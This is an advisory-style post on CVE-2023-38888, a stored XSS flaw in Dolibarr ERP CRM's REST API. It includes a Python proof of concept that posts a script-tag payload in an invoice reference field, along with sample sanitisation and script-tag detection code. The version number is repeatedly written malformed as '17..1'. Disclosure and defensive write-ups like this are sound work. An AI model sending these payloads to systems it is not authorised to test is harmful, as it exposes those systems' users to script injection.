CVE-2023-38888: Cross Site Scripting Vulnerability Discovered in Dolibarr ERP CRM v.17..1 and Before, Allowing Remote Access and Code Execution via REST API Module

Dolibarr ERP CRM is a popular open-source software package used for managing businesses and organizations. The software includes modules for managing products, orders, invoices, projects, and other business-related tasks. Unfortunately, a Cross Site Scripting (XSS) vulnerability has been discovered in Dolibarr ERP CRM versions 17..1 and before. The vulnerability, identified as CVE-2023-38888, allows a remote attacker to obtain sensitive information and execute arbitrary code via the REST API module; it is related to the functions analyseVarsForSqlAndScriptsInjection() and testSqlAndScriptInject().

Vulnerability Details

The vulnerability exists because the Dolibarr application does not properly sanitize user input within the REST API module, which can lead to the execution of malicious JavaScript code. Attackers can exploit this vulnerability by sending a malformed request containing injected scripts, resulting in sensitive information disclosure and arbitrary code execution.

A proof-of-concept (PoC) code snippet demonstrating the vulnerability is shown below:

import requests

# Placeholder target URL and API key; replace them with the instance under test.
target_url = "http://TARGET-DOLIBARR-URL/api/index.php/invoices"
headers = {
    'DOLAPIKEY': 'YOUR-API-KEY',
    'Content-Type': 'application/json'
}
# New invoice whose reference field carries the script payload.
data = {
    "ref": "<script>alert('XSS')</script>"
}

# json= serialises the body as JSON, matching the Content-Type header above
# (data= would have sent it form-encoded instead).
response = requests.post(target_url, headers=headers, json=data)
print(response.status_code)
print(response.text)

The code snippet above uses the Python requests library to send a POST request that creates a new invoice whose reference field carries the payload "<script>alert('XSS')</script>". When the Dolibarr REST API processes the request, the unsanitized input is accepted and triggers the XSS vulnerability, resulting in an alert reading 'XSS' in the Dolibarr application interface.

Mitigation and Fix

The Dolibarr development team has released a patched version of the software (version 17..2) that addresses this issue. The patch involves proper input validation and sanitization within the REST API module to prevent XSS attacks. Users of Dolibarr ERP CRM are strongly advised to upgrade to the latest version to protect themselves against this vulnerability.
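As an added illustration of the two controls such a fix relies on (this is not Dolibarr's patch and does not reproduce its functions), the hypothetical request handler below applies an allowlist to a structured field like the invoice reference and HTML-escapes any free-text field, with a separate detection check that a defender can use for logging and alerting. All function names, the allowlist pattern and the field names other than ref are assumptions made for the example.

```python
import html
import json
import re

# Hypothetical allowlist: an invoice reference is letters, digits, '.', '_' or '-'.
REF_PATTERN = re.compile(r"^[A-Za-z0-9._-]{1,64}$")

# Fields that must match the allowlist. Every other string field is treated as
# free text and stored HTML-escaped so a later render in an HTML page is inert.
STRICT_FIELDS = {"ref"}


class ValidationError(ValueError):
    """Raised when a request body must be rejected outright."""


def sanitize_body(raw_body: str) -> dict:
    """Parse a JSON request body (as sent by the PoC above) and return a clean copy.

    Strict fields are validated against REF_PATTERN and the whole request is
    rejected on a miss; other string values are escaped for an HTML text
    context; non-string values (numbers, booleans, null) pass through.
    """
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError as exc:
        raise ValidationError(f"body is not valid JSON: {exc}") from None
    if not isinstance(body, dict):
        raise ValidationError("body must be a JSON object")

    clean = {}
    for key, value in body.items():
        if key in STRICT_FIELDS:
            if not isinstance(value, str) or not REF_PATTERN.match(value):
                raise ValidationError(f"field {key!r} contains disallowed characters")
            clean[key] = value
        elif isinstance(value, str):
            # quote=True also escapes ' and ", covering attribute contexts.
            clean[key] = html.escape(value, quote=True)
        else:
            clean[key] = value
    return clean


def looks_like_script_injection(value: str) -> bool:
    """Detection-side check for logging/alerting, not a substitute for the allowlist.

    Case-insensitive because HTML tag names are case-insensitive.
    """
    return re.search(r"<\s*/?\s*script\b", value, re.IGNORECASE) is not None
```

The allowlist is the primary control; the detection regex only tells you that someone tried, which is what you want in the API access log.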

To upgrade Dolibarr ERP CRM, follow the official upgrade documentation provided by the developers: https://wiki.dolibarr.org/index.php/Upgrade

Details of the vulnerability can be found in the following sources:

1. CVE Record: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38888
2. Dolibarr Official Repository: https://github.com/Dolibarr/dolibarr
3. Dolibarr Upgrade Documentation: https://wiki.dolibarr.org/index.php/Upgrade

Conclusion

Cross Site Scripting vulnerabilities remain one of the most common security issues in web applications and enterprise software. It is crucial for developers to rigorously test and sanitize user inputs, especially in modules handling sensitive data and APIs. Users of Dolibarr ERP CRM should take immediate steps to upgrade their installations to the newest version and minimize the risk of exploitation.

Timeline

Published on: 09/20/2023 01:15:00 UTC
Last modified on: 09/22/2023 01:37:00 UTC